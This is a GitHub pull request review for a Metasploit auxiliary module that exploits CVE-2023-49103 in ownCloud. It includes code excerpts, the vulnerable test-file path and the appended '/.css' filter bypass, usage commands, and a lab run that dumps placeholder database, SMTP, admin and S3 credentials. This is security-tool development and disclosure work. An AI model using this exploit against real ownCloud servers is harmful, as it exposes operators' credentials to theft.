New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
ownCloud phpinfo reader (CVE-2023-49103) #18591
Conversation
CC @cfreal |
|
||
### ENDFILE | ||
|
||
The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, | |
The file path to add to the end of the URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, |
'Christian Fischer' # additional PoC work and research | ||
], | ||
'References' => [ | ||
[ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
[ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], | |
[ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], | |
[ 'URL', 'https://www.ambionics.io/blog/owncloud-cve-2023-49103-cve-2023-49105'], |
if res.body =~ /#{field_regex('HOSTNAME')}/ | ||
print_good("Hostname: #{::Regexp.last_match(1)}") | ||
end | ||
if res.body =~ /#{field_regex('HOME')}/ | ||
print_good("Home: #{::Regexp.last_match(1)}") | ||
end | ||
if res.body =~ /#{field_regex('APACHE_DOCUMENT_ROOT')}/ | ||
print_good("Server Root: #{::Regexp.last_match(1)}") | ||
end | ||
if res.body =~ /#{field_regex('PWD')}/ | ||
print_good("PWD: #{::Regexp.last_match(1)}") | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I think it would be nice to have this factored into a loop, with key/values.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I originally had it coded like that, but then trying to print the values out with nice labels, and post process groups together made it a little more unruly. Decided this was, while repetitive and long winded feeling, was better for organizing
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I was just in the middle of refactoring / making the change @jvoisin had suggested.
I was also experimenting with using an xpath instead of regex here. I know we usually prefer extracting data from response bodies using xpath for efficiency, especially when they're large, as is the case here - still testing.
@h00die I'll post a review either later today or early tomorrow.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the great module @h00die. Hope you don't mind the commit I pushed up. I was originally trying to swap out the method field_regex
for the following:
def field_xpath(field)
"//tr[td[text() = '#{field} ']]/td[@class='v']/text()"
end
As I've always been under the impression that matching response bodies with xpath is supposed to be more efficient. After some benchmarking with couple thousands of module runs, I found that was not the case - possibly because I wasn't using a full xpath.
With field_regex
the module took about 0.05
seconds to run on average.
with field_xpath
the module took about 0.25
seconds to run on average.
The response body was so large the full xpaths were quite long and specific I didn't think it made sense to use them.
Anyways, the module was running perfectly before my commit and gives the same output after it's been applied:
msf6 > use auxiliary/gather/owncloud_phpinfo_reader
[*] Using auxiliary/gather/owncloud_phpinfo_reader
msf6 auxiliary(gather/owncloud_phpinfo_reader) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(gather/owncloud_phpinfo_reader) > run
[*] Running module against 127.0.0.1
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Loot stored to: /Users/jheysel/.msf4/loot/20231204202617_default_127.0.0.1_owncloud.phpinfo_634937.txt
[+] License Key: 1122333
[+] Hostname: cd1977074298
[+] Home: /root
[+] Server Root: /var/www/owncloud
[+] PWD: /var/www/owncloud
[+] SMTP Username: smtp_username
[+] SMTP Password: smtp_password
[+] ownCloud Username: admin_username
[+] ownCloud Password: admin_password
[+] ownCloud Server Port: 8080
[+] DB Host: mariadb:3306
[+] DB Username: owncloud
[+] DB Password: owncloud
[+] DB Name: owncloud
[+] DB Type: mysql
[+] Redis Host: redis
[+] Redis Port: 6379
[+] ObjectStore Endpoint: https://s3.us-east-1.amazonaws.com
[+] ObjectStore Region: us-east-1
[+] ObjectStore Secret: secret123456
[+] ObjectStore Key: owncloud123456
[+] ObjectStore Bucket: owncloud
[+] Credentials
===========
Type Host Username Password Notes
---- ---- -------- -------- -----
S3 Object Store us-east-1 Key: owncloud123456 Secret: secret123456 Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
SMTP 127.0.0.1:25 smtp_username smtp_password
mysql 127.0.0.1:8080 owncloud owncloud
ownCloud 127.0.0.1:8080 admin_username admin_password
[*] Auxiliary module execution completed
documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
Outdated
Show resolved
Hide resolved
I'm good with it! I was trying to leverage speed of completeness since this is in the headlines. Glad it's working! Ship it 🚢 |
Release NotesThis PR adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP and S3 credentials |
Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app
graph
installedcontain a test file which prints
phpinfo()
to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
use auxiliary/gather/owncloud_phpinfo_reader
set rhost [ip]
run